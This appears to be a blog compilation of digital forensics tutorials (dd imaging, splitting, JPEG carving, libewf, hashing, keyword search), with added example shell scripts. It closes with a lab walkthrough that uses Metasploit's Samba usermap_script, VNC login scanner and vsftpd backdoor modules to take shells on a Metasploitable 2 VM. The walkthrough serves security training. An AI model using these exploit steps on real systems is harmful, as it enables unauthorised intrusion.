Tuesday, 18 February 2014

Digital Forensics: Acquiring a Large Capacity Disk


Splitting a Large Capacity Disk Image

List the block devices attached to your laptop or computer:
root@bt:~/evid# fdisk -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.
Disk /dev/sda: 500.1 GB, 500107862016 bytes
255 heads, 63 sectors/track, 60801 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 4096 bytes
Disk identifier: 0xb05cd80c
 Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1          13      102400    7  HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2              13       12749   102297600    7  HPFS/NTFS
/dev/sda3           12749       18828    48828125   83  Linux
/dev/sda4           18828       60801   337154049    f  W95 Ext'd (LBA)
Partition 4 does not start on physical sector boundary.
/dev/sda5           18828       19077     1999872   82  Linux swap / Solaris
/dev/sda6           19077       60801   335153152    7  HPFS/NTFS
Disk /dev/sdc: 7803 MB, 7803174912 bytes
241 heads, 62 sectors/track, 1019 cylinders
Units = cylinders of 14942 * 512 = 7650304 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00044125

The output shows that /dev/sdc is the 8 GB device (the flash drive). Image it with dd, which makes a raw, bit-for-bit copy of the whole device:
root@bt:~/evid# dd if=/dev/sdc of=image.disk2.dd
Use ls to see the files in the evid folder.

split normally works on lines of input (i.e. from a text file). With the -b option we force split to treat the file as binary input and lines are ignored.
In newer versions of split we can also use the -d option to get numeric suffixes (*.00, *.01, *.02, etc.) instead of the default alphabetic ones.

split -d -b XXm <file to be split> <prefix of output files>
Split image.disk2.dd into pieces of 2000 MiB:
root@bt:~/evid# split -d -b 2000m image.disk2.dd image.split2.
For our 7.8 GB image this results in four files of at most 2000 MiB each, named with the prefix "image.split2." as given in the command, followed by "00", "01", "02" and "03" (assuming a newer version of split that supports the -d option is used):
root@bt:~/evid# ls image.split2.*

The process can be reversed. If we want to reassemble the image from
the split parts (from CD-R, etc.), we can use the cat command and redirect the
output to a new file.
root@bt:~/evid# cat image.split2.00 image.split2.01 image.split2.02 image.split2.03 > image2.new
OR
root@bt:~/evid# cat image.split2.0* > image2.new
(The glob works because the -d suffixes are fixed width and sort in order; with ten or more pieces use image.split2.* instead, since 0* only matches 00 to 09.)
Compare the hashes:
root@bt:~/evid# cat image.split2.0* | md5sum
root@bt:~/evid# md5sum image2.new 

Looking at the output of the above commands, we see that all the md5sum hashes match (don't confuse sha1sum output with md5sum output; hashes from different algorithms are never comparable). The hash of the original image (or of /dev/sdc itself) is the same as the hash of the split pieces "cat-ed" together and the hash of the newly reassembled image, which shows that splitting and reassembly were lossless.
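The whole chain (acquire with dd, split, reassemble, compare hashes) as one script. This is an added example, not code from the original page: an ordinary file of random bytes stands in for /dev/sdc, the piece size is shrunk to 300 KiB so the run takes a second, and the function names (acquire, split_image, reassemble, verify_pipeline) are mine. It also covers the dd basics given further down the page (bs= and conv=noerror,sync).

```shell
#!/bin/sh
# Added example: acquire a "device" with dd, split the image, reassemble it and
# verify with md5sum at every step. A file of random bytes stands in for /dev/sdc.
set -eu

# acquire <source> <image>: raw copy. conv=noerror continues past read errors and
# sync pads short/unreadable blocks with NULs so later offsets stay aligned.
acquire() {
  dd if="$1" of="$2" bs=512 conv=noerror,sync 2>/dev/null
}

# split_image <image> <size for split -b> <prefix>
#  -b: treat the input as bytes, not lines   -d: numeric suffixes starting at 00
split_image() {
  split -d -b "$2" "$1" "$3"
}

# reassemble <prefix> <output>: cat the pieces back together in suffix order.
# "$1"* rather than "$1"0* so it still works with ten or more pieces.
reassemble() {
  cat "$1"* > "$2"
}

hash_of() { md5sum "$1" | cut -d' ' -f1; }

# verify_pipeline: run the whole chain on constructed data and print OK when the
# hashes of device, image, cat-ed pieces and reassembled image all agree.
verify_pipeline() {
  work=$(mktemp -d)
  # constructed "device": 1 MiB of random bytes (a multiple of 512, like a real
  # disk, so conv=sync adds no padding); 300 KiB pieces give 3 full ones + 1 short
  head -c 1048576 /dev/urandom > "$work/device"

  acquire "$work/device" "$work/image.disk2.dd"
  split_image "$work/image.disk2.dd" 300k "$work/image.split2."
  reassemble "$work/image.split2." "$work/image2.new"

  h_dev=$(hash_of "$work/device")
  h_img=$(hash_of "$work/image.disk2.dd")
  h_cat=$(cat "$work/image.split2."* | md5sum | cut -d' ' -f1)
  h_new=$(hash_of "$work/image2.new")
  pieces=$(( $(ls "$work/image.split2."* | wc -l) ))
  rm -rf "$work"

  if [ "$h_dev" = "$h_img" ] && [ "$h_img" = "$h_cat" ] && \
     [ "$h_cat" = "$h_new" ] && [ "$pieces" -eq 4 ]; then
    echo OK
  else
    echo MISMATCH
  fi
}

verify_pipeline   # prints: OK
```

Scaled to the page's numbers, the same chain with -b 2000m on the 7.8 GB image.disk2.dd gives image.split2.00 to image.split2.03. Hash the device itself (md5sum /dev/sdc) before anything else and write the value down; it is the reference that every later copy is compared against.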


Data carving with dd
Download image_carve.raw and copy it to ~/evid.
Have a brief look at the file image_carve.raw with the command-line hexdump tool xxd:
root@bt:~/evid# xxd image_carve.raw | less

Find the start of the JPEG (xxd and grep). A JPEG begins with the bytes ff d8 (the SOI marker) and ends with ff d9 (the EOI marker):
root@bt:~/evid# xxd image_carve.raw | grep ffd8
00052a0: b4f1 559c ffd8 ffe0 0010 4a46 4946 0001 ..U.......JFIF..

Now we can calculate the byte offset in decimal
root@bt:~/evid# echo "ibase=16;00052A0" | bc
21152

The ffd8 starts 4 bytes into that line (after b4f1 559c), so we add 4 to the line's offset: 21152 + 4 = 21156.
Now it’s time to find the end of the file.
root@bt:~/evid# xxd -s 21156 image_carve.raw | grep ffd9
0006c74: ffd9 d175 650b ce68 4543 0bf5 6705 a73c ...ue..hEC..g..<
Convert to decimal:
root@bt:~/evid# echo "ibase=16;0006C74" | bc
27764

Now that we know the start and the end of the file, we can calculate the size. The ffd9 marker starts at 27764 and both of its bytes must be included, so the end offset is 27766:
root@bt:~/evid# echo "27766 - 21156" | bc
6610

We now know the file is 6610 bytes in size and starts at byte offset 21156. The carving is the easy part. We use dd with three options: skip= how far into the data chunk we begin cutting, bs= (block size) the number of bytes per block, and count= the number of blocks to cut. With bs=1, skip and count are simply byte counts.
root@bt:~/evid# dd if=image_carve.raw of=carv.jpg skip=21156 bs=1 count=6610
6610+0 records in
6610+0 records out
6610 bytes (6.6 kB) copied, 0.0285196 s, 232 kB/s
This creates a file in the current directory called carv.jpg. If you are in X, use the xv command to view it; xv run from a command line (while in an X session) displays the image in its own window.
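The header/trailer search and the dd cut above, done on byte offsets instead of reading them off xxd output. This is an added example, not code from the original page: image_carve.raw is replaced by a constructed file with a 21-byte fake JPEG planted at offset 300, and find_marker, carve_jpeg, build_sample and demo_carve are my own names. Unlike grep on xxd output, find_marker steps through the bytes one at a time, so a marker starting at an odd offset (which xxd's two-byte grouping would print as "..ff d8.." and the grep would miss) is still found.

```shell
#!/bin/sh
# Added example: find JPEG start/end markers by byte offset and carve with dd.
set -eu

# find_marker <file> <hex marker, e.g. ffd8> <start offset>
# Prints the byte offset of the first occurrence at or after <start offset>, or nothing.
# od dumps one hex pair per byte; awk steps through them byte by byte, so the
# marker is matched at any alignment.
find_marker() {
  od -An -v -tx1 -j "$3" "$1" | tr -d ' \n' | awk -v m="$2" -v base="$3" '
    {
      n = length($0) / 2
      for (i = 0; i < n; i++)
        if (substr($0, 2*i + 1, length(m)) == m) { print base + i; exit }
    }'
}

# carve_jpeg <image> <output>: cut from ffd8 through the next ffd9 inclusive;
# prints the carved size in bytes.
carve_jpeg() {
  start=$(find_marker "$1" ffd8 0)
  [ -n "$start" ] || { echo "no JPEG header (ffd8) found" >&2; return 1; }
  end=$(find_marker "$1" ffd9 "$start")
  [ -n "$end" ] || { echo "no JPEG trailer (ffd9) found" >&2; return 1; }
  end=$((end + 2))          # include both bytes of the ffd9 marker, as on the page
  size=$((end - start))
  dd if="$1" of="$2" bs=1 skip="$start" count="$size" 2>/dev/null
  echo "$size"
}

# build_sample <dir>: constructed stand-in for image_carve.raw: 300 filler bytes,
# a 21-byte minimal "JPEG" (SOI, APP0/JFIF, payload, EOI), then 200 more filler bytes.
build_sample() {
  { head -c 300 /dev/zero | tr '\0' 'A'
    printf '\377\330\377\340\000\020JFIF\000\001PAYLOAD\377\331'
    head -c 200 /dev/zero | tr '\0' 'B'
  } > "$1/image_carve.raw"
  printf '\377\330\377\340\000\020JFIF\000\001PAYLOAD\377\331' > "$1/expected.jpg"
}

# demo_carve: carve the planted file and check it byte for byte against the original.
demo_carve() {
  work=$(mktemp -d)
  build_sample "$work"
  start=$(find_marker "$work/image_carve.raw" ffd8 0)
  size=$(carve_jpeg "$work/image_carve.raw" "$work/carv.jpg")
  if cmp -s "$work/carv.jpg" "$work/expected.jpg"; then ok=OK; else ok=MISMATCH; fi
  rm -rf "$work"
  echo "$start $size $ok"
}

demo_carve   # prints: 300 21 OK
```

carve_jpeg stops at the first ffd9 after the header, exactly as the walkthrough does. A real JPEG with an embedded EXIF thumbnail contains an earlier ffd9 that ends the thumbnail, so the carved file would be cut short; check the result with file or a viewer. On large images bs=1 is slow; GNU dd accepts the same byte offsets with a large block size via bs=4M iflag=skip_bytes,count_bytes.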

LIBEWF - Working with Expert Witness Files
The libewf tools and detailed project information can be found at:
https://www.uitwisselplatform.nl/projects/libewf/
We will cover the following tools briefly here:
ewfinfo
ewfverify
ewfexport
ewfacquire
ewfacquirestream

ewfinfo
root@bt:~/evid# ewfinfo ntfs_pract.E01

ewfverify
root@bt:~/evid# ewfverify ntfs_pract.E01



ewfexport
root@bt:~/evid# ewfexport ntfs_pract.E01 | md5sum
 

root@bt:~/evid# ewfexport -t ntfs_image.dd ntfs_pract.E01

root@bt:~/evid# md5sum ntfs_image.dd
d3c4659e4195c6df1da3afdbdc0dce8f ntfs_image.dd

ewfacquire
root@bt:~/evid# ewfacquire /dev/sdc
Acquiry parameters required, please provide the necessary input
Image path and filename without extension: /root/ntfs_ewf
Case number: 111-222
Description: Removable media (generic thumdrive)
Evidence number: 1
Examiner name: Umar Alfaruq
Notes: Seized from subject
Media type (fixed, removable, optical, memory) [removable]: removable disk
Selected option not supported, please try again or terminate using Ctrl^C.
Media type (fixed, removable, optical, memory) [removable]: removable
Media characteristics (logical, physical) [logical]: physical
Use compression (none, empty-block, fast, best) [none]: fast
Use EWF file format (ewf, smart, ftk, encase1, encase2, encase3, encase4, encase5, encase6, linen5, linen6, ewfx) [encase6]: encase5
Start to acquire at offset (0 >= value >= 4040748544) [0]:
The amount of bytes to acquire (0 >= value >= 4040748544) [4040748544]:
Evidence segment file size in bytes (1.0 MiB >= value >= 1.9 GiB) [1.4 GiB]:
The amount of bytes per sector (0 >= value >= 4294967295) [512]:
The amount of sectors to read at once (64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384, 32768) [64]:
The amount of sectors to be used as error granularity (1 >= value >= 64) [64]:
The amount of retries when a read error occurs (0 >= value >= 255) [2]:
Wipe sectors on read error (mimic EnCase like behavior) (yes, no) [no]: yes

Monday, 17 February 2014

Basic Computer Forensics Commands

Tools for forensic data

1. dd,
resource : http://www.forensicswiki.org/wiki/Dd

dd makes a bit-for-bit copy of a device or file into a raw image. Reading the source this way does not modify it, so properties of the evidence such as timestamps are left unchanged.

Usage: dd [OPERAND]...
  or:  dd OPTION

The basic dd syntax is as follows:
# dd if=  of=   bs=
("if" being "input file" and "of" meaning "output file").

To clone a drive onto another, wiped and formatted drive (fill in the source and destination device names):
# dd if=/dev/ of=/dev/ bs=512 conv=noerror,sync 
Or write the output to a file: 
# dd if=/dev/ of=/home/user/linux_image.dd bs=512 conv=noerror,sync
conv=noerror makes dd continue past read errors instead of stopping; sync pads every short or unreadable block with NULs so everything after it keeps the same offset as on the original. If any errors occurred, the padded blocks mean the image's hash can no longer be compared with a hash of the source, so record the errors dd reports.
root@bt:~/evid# dd if=/dev/fd0 of=image.disk1 bs=512
In Linux, the block size value can have a multiplicative suffix:
c =1
w =2
b =512
kB =1000,           K =1024
MB =1000*1000,      M =1024*1024
GB =1000*1000*1000, G =1024*1024*1024
and so on for T, P, E, Z, Y. 

2. libewf
resource : http://code.google.com/p/libewf/wiki/Mounting
 
libewf is a library to access the Expert Witness Compression Format (EWF).

- mkdir /mnt/ewfimage
- mount the image (read-only, via FUSE):

ewfmount image.E01 /mnt/ewfimage/
This will create the following device file:
/mnt/ewfimage/ewf1
- unmount:
umount /mnt/ewfimage/
Or fusermount:

fusermount -u /mnt/ewfimage/

3. sleuthkit
resource : http://www.sleuthkit.org/ 
A library, framework, and set of command line tools to analyze disk images. 


- Its command-line forensic tools analyze disk images and perform in-depth analysis of file systems (such as NTFS, FAT, HFS+, Ext3, and UFS) and several volume system types. For a graphical interface, use Autopsy.

root@bt:~# icat -h
Missing image name and/or address
usage: icat [-hrRsvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-o imgoffset] image [images] inum[-typ[-id]]
        -h: Do not display holes in sparse files
        -r: Recover deleted file
        -R: Recover deleted file and suppress recovery errors
        -s: Display slack space at end of file
        -i imgtype: The format of the image file (use '-i list' for supported types)
        -b dev_sector_size: The size (in bytes) of the device sectors
        -f fstype: File system type (use '-f list' for supported types)
        -o imgoffset: The offset of the file system in the image (in sectors)
        -v: verbose to stderr
        -V: Print version
 


http://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview
http://wiki.sleuthkit.org/index.php?title=FS_Analysis



4. Autopsy
A graphical interface to the Sleuth Kit and other digital forensics tools.



Introduction to Computer / Digital Forensics: practical_floppy.dd

A computer forensics investigation has five phases:
1. Identification
2. Preservation: preserve the evidence, keep the physical chain of custody and label the exhibits
3. Examination / collection
4. Analysis (chain of custody, analysis, collection, reconstruction)
5. Presentation: report and conclusion.

There are two types of data:
1. Volatile: lost when the computer is switched off, e.g. data in RAM
2. Non-volatile: not lost when the computer is switched off, e.g. data on HDD, FDD, etc.

Tools for digital forensics
on Linux:
  • TSK (The Sleuth Kit)
  • libewf
  • AFF
  • dd, to clone a device
  • Volatility, to analyze RAM
  • PTK, cal
  • Xplico, for network forensics
  • etc.
on Windows: EnCase, FTK

Practice example.
Resource: The Law Enforcement and Forensic Examiner's Introduction to Linux
 


1. Analysis organization
Forensic analysis of practical_floppy.dd

The practice floppy (in raw image format from a simple dd) for the following exercise is available at:

http://www.LinuxLEO.com/Files/practical.floppy.dd

Once you have downloaded the floppy image, start the analysis.
- BackTrack has no /dev/fd0 here, so it was created with touch. Note that touch makes an ordinary empty file, not a device node, so dd from it copies nothing; if all you have is the downloaded image, use practical.floppy.dd itself as the input wherever /dev/fd0 appears below.



- Create a directory in your home directory for evidence (mkdir ~/evid) and then a subdirectory for each case.

The tilde (~) in front of the directory name is shorthand for "home directory". Note that if you are already in your home directory, you don't need to type ~/; simply using mkdir evid will work just fine. So the output files that we create and the images we make will be found under /root/evid/.

- create a special mount point for all subject file system analysis

root@bt:~# mkdir /mnt/analysis

Determining the structure of the disk

The first tool, fdisk, we discussed earlier using the -l option. Replace the "x" in /dev/sdx (or /dev/hdx) with the letter of the drive that corresponds to the subject drive. For example, if our subject disk is attached on the secondary IDE channel as the master disk, it will be seen as /dev/hdc. A Serial ATA (SATA) disk will be /dev/sda (or sdb, etc.). We can get the partition information on that disk with:

root@bt:~# fdisk -l /dev/sda



We can redirect the output of this command to a file for later use by
issuing the command as:

root@bt:~# fdisk -l /dev/sda > ~/evid/fdisk.disk1




Creating a forensic image of the suspect disk

- Change directory to ~/evid, then make an image of the practice disk using basic dd:
root@bt:~/evid# dd if=/dev/fd0 of=image.disk1 bs=512

if=/dev/fd0 : input file, the floppy device
of=image.disk1 : output file called image.disk1, written to the current directory (~/evid)
bs=512 : block size of 512 bytes, one floppy sector

- For the sake of safety and practice, change the read-write permissions of your image to read-only.

If you want to be really picky, give it mode 400 with chmod (readable by the owner only, writable by nobody).

Mounting the original floppy or the restored image

Mount the floppy itself read-only:
root@bt:~/evid# mount -t vfat -o ro,noexec /dev/fd0 /mnt/analysis/
To mount the image file instead, add the loop option and give the image in place of the device:
root@bt:~/evid# mount -t vfat -o ro,noexec,loop image.disk1 /mnt/analysis/

-o specifies the mount options:
ro : read-only
noexec : prevents the execution of binaries from the mount point

Be sure to unmount when finished:

root@bt:~/evid# umount /mnt/analysis/



File Hashes

You can use a SHA or MD5 hash.

root@bt:~/evid# md5sum /dev/fd0

To hash /dev/fd0 and write the result to the file md5.disk1, type:
root@bt:~/evid# md5sum /dev/fd0 > md5.disk1

- We can get a hash of each file on the disk using the find command and an option that allows us to execute a command on each file found.

- Mount the image:
root@bt:~/evid# mount -t vfat -o ro,noexec,noatime,loop image.disk1 /mnt/analysis
root@bt:~/evid# cd /mnt/analysis

-t : file system type (vfat)
ro : read-only
noexec : prevents the execution of binaries from the mount point
noatime : do not update access times on the mounted file system, so reading files leaves the evidence's timestamps alone
loop : mount the image file through a loop device

- Once we are in the /mnt/analysis directory we can run a command that finds all the regular files on the file system at that mount point and hashes each of them:

root@bt:/mnt/analysis# find . -type f -exec md5sum {} \; > ~/evid/md5.filelist
find : the command
"." : start in the current directory (the mount point), so the list holds paths relative to it
-type f : regular files only
-exec : execute the following command on each file found
md5sum {} : compute the MD5 hash of each file ({} is replaced by the file name)
> : redirect the output to
md5.filelist : the output file name
~/evid/ : the directory where we store all our evidence files

- Have a look at the hashes by using the cat command to stream the file to standard output:
root@bt:/mnt/analysis# cat /root/evid/md5.filelist

- To verify that nothing has changed on the original floppy, use the -c option, which reads the hashes from the file and recomputes them:

root@bt:/mnt/analysis# md5sum -c /root/evid/md5.disk1

The file list can be checked the same way. Because find wrote relative paths (./...), this must be run from /mnt/analysis with the image mounted:

root@bt:/mnt/analysis# md5sum -c /root/evid/md5.filelist
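The manifest and verification steps above, run end to end on a constructed directory tree standing in for /mnt/analysis. This is an added example, not code from the original page; the file names and contents are made up, and make_filelist, check_filelist and demo_hashlist are my names. It also shows the two things worth knowing before relying on md5sum -c: an edited file makes the check fail, and the check must be run from the mount point because find wrote relative paths.

```shell
#!/bin/sh
# Added example: hash every file under a mount point into a manifest, then verify it.
set -eu

# make_filelist <mountpoint> <listfile>: the page's find/md5sum pipeline, run from
# inside the mount point so the manifest holds paths relative to it (./Docs/...).
make_filelist() {
  ( cd "$1" && find . -type f -exec md5sum {} \; ) > "$2"
}

# check_filelist <mountpoint> <listfile>: exit 0 only if every listed file still
# hashes the same; md5sum -c exits 1 on any FAILED or unreadable entry.
check_filelist() {
  ( cd "$1" && md5sum -c "$2" >/dev/null 2>&1 )
}

# demo_hashlist: build a tree, make the manifest, verify, tamper, verify again.
demo_hashlist() {
  work=$(mktemp -d)
  mnt="$work/analysis"
  mkdir -p "$mnt/Docs" "$mnt/Pics"
  # constructed stand-ins for the floppy's files; contents are arbitrary
  printf 'MZ arp stub\n'       > "$mnt/ARP.EXE"
  printf 'meeting memo\n'      > "$mnt/Docs/memo.txt"
  printf 'not really a jpeg\n' > "$mnt/Pics/photo.jpg"

  make_filelist "$mnt" "$work/md5.filelist"
  files=$(( $(wc -l < "$work/md5.filelist") ))

  check_filelist "$mnt" "$work/md5.filelist" && clean=0 || clean=1

  printf 'meeting memo (edited)\n' > "$mnt/Docs/memo.txt"   # simulate tampering
  check_filelist "$mnt" "$work/md5.filelist" && tampered=0 || tampered=1

  # relative paths: verifying from any other directory cannot find the files
  check_filelist "$work" "$work/md5.filelist" && elsewhere=0 || elsewhere=1

  rm -rf "$work"
  echo "files:$files clean:$clean tampered:$tampered elsewhere:$elsewhere"
}

demo_hashlist   # prints: files:3 clean:0 tampered:1 elsewhere:1
```

On the real mount the image is read-only, so the "tampered" case can only arise if the wrong thing was mounted or the manifest was made from a different image; either way a failed check is the signal to stop and re-establish which copy you are looking at.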



The Analysis

- With the image mounted on /mnt/analysis, list everything with ls -al:
root@bt:/mnt/analysis# ls -al

This will show all the hidden files (-a), give the list in long format to
identify permission, date, etc. (-l). You can also use the –R option to list
recursively through directories. You might want to pipe that through less.

root@bt:/mnt/analysis# ls -alR | less


Making a List of All Files

- For example, you could use the -i option to include the inode (file "serial number") in the list, and the -u option so that the output includes and sorts by access time (when used with the -t option).


root@bt:/mnt/analysis# ls -aliRtu > ~/evid/access_file.list

- using the find command and redirecting the output to another list file:

root@bt:/mnt/analysis# find . -type f > ~/evid/file.list.2

- There is also the tree command.


Now use the grep command on either of the lists created by the first two commands above for whatever strings or extensions you want to look for, for example grep -i jpg ~/evid/file.list.2:

-i : case-insensitive
jpg : the string to look for (here, JPEG file names)


Making a List of File Types

The file command identifies a file by its content (magic bytes), not by its name or extension, so a renamed file is still classified correctly:

file filename

root@bt:/mnt/analysis# find . -type f -exec file {} \; > ~/evid/filetype.list

root@bt:/mnt/analysis# cat ~/evid/filetype.list


root@bt:/mnt/analysis# grep image ~/evid/filetype.list


Viewing Files

For text files and data files, you might want to use cat, more or less to
view the contents.

cat filename
more filename
less filename


Perhaps a better alternative for viewing unknown files would be to use
the strings command.

strings filename | less


root@bt:/mnt/analysis# ls
ARP.EXE  Docs  FTP.EXE  loveletter.virus  ouchy.dat  Pics  snoof.gz

root@bt:/mnt/analysis# strings arp.exe | less


Once you are finished exploring, be sure to unmount the floppy (umount /mnt/analysis).




Searching Unallocated and Slack Space for Text

Now let’s go back to the original image.
First, change back to the directory in which you created the image, whether it was the root’s home directory, or a special one you created.

root@bt:~# cd evid/
root@bt:~/evid#

Use the grep command to search the image for any instance of an expression or pattern:

grep -options <pattern> <file-to-search>

Put the search terms in a file, one per line:
root@bt:~/evid# nano searchlist.txt

root@bt:~/evid# grep -abif searchlist.txt image.disk1 > hits.txt
root@bt:~/evid# cat hits.txt

-a treats the binary image as text, -b prints the byte offset of each hit, -i makes the search case-insensitive and -f reads the patterns from searchlist.txt. Without -o, the offset printed is that of the start of the "line" in which the match was found, which in binary data can be far before the match; add -o to get the offset of the matching text itself, which is the number to feed to xxd -s.




Take an offset from hits.txt and use xxd -s to look at the data around the hit:
root@bt:~/evid# xxd -s 75441 image.disk1 | less
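The search with grep's -b offset, run on a constructed image where the text "Top Secret plan" is planted at byte 100. This is an added example, not code from the original page; search_image and demo_search are my names. It shows why -o belongs in the grep: without it, -b reports the offset of the start of the "line" grep matched (here 0, because no newline precedes the text), and that is the number one would wrongly hand to xxd -s.

```shell
#!/bin/sh
# Added example: search a raw image for keywords and get byte offsets usable with xxd -s or dd.
set -eu

# search_image <image> <pattern file>: prints "byteoffset:matchedtext", one line per hit.
#  -a treat the binary image as text   -b print the byte offset   -o print only the match
#  -i case-insensitive                 -f read patterns, one per line, from a file
# LC_ALL=C makes grep work on raw bytes, so non-UTF-8 garbage in the image cannot stop it.
search_image() {
  LC_ALL=C grep -aboif "$2" "$1"
}

# demo_search: build the constructed image and compare the offsets with and without -o.
demo_search() {
  work=$(mktemp -d)
  # constructed image: 100 filler bytes, the planted string at offset 100, more filler
  { head -c 100 /dev/zero | tr '\0' 'x'
    printf 'Top Secret plan\n'
    head -c 50 /dev/zero | tr '\0' 'y'
  } > "$work/image.disk1"
  printf 'secret\n' > "$work/searchlist.txt"

  with_o=$(search_image "$work/image.disk1" "$work/searchlist.txt" | head -n 1)
  # the page's exact flags, without -o: the offset is that of the "line", not the match
  without_o=$(LC_ALL=C grep -abif "$work/searchlist.txt" "$work/image.disk1" | head -n 1 | cut -d: -f1)
  rm -rf "$work"
  echo "$with_o $without_o"
}

demo_search   # prints: 104:Secret 0
```

"Secret" starts 4 bytes into the planted string, hence 104. The same offset works with xxd -s 104 image.disk1 or with dd bs=1 skip=104 to pull the surrounding bytes out for closer inspection.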






Wednesday, 05 February 2014

Metasploitable 2 Exploitability

Install Metasploitable 2 in VirtualBox and start it.

It looks like this:

Scan it with nmap, Zenmap and Nessus.











1. Samba

Let’s search for a Samba exploit and try it against the system:

msf  auxiliary(tikidblib) > use exploit/multi/samba/usermap_script
msf  exploit(usermap_script) > show options
msf  exploit(usermap_script) > set RHOST 192.168.56.101


msf  exploit(usermap_script) > exploit




Type id and press Enter to see which user the shell is running as.


2. VNC
Search for a VNC exploit.

Use auxiliary/scanner/vnc/vnc_login, then show options and set RHOST.

Next, run the module. As the screenshot shows, we get the VNC password: "password".
Open a new terminal, type vncviewer and press Enter.

In the pop-up asking for the target, type 192.168.56.101.

Press Enter; a new input window pops up asking for the VNC password, so type "password".

A new window with the desktop pops up.

We now control Metasploitable 2.


3. FTP

Search for an FTP exploit:
msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf  exploit(vsftpd_234_backdoor) > set RHOST 192.168.56.101
msf  exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact


Run exploit; again we get a shell on Metasploitable.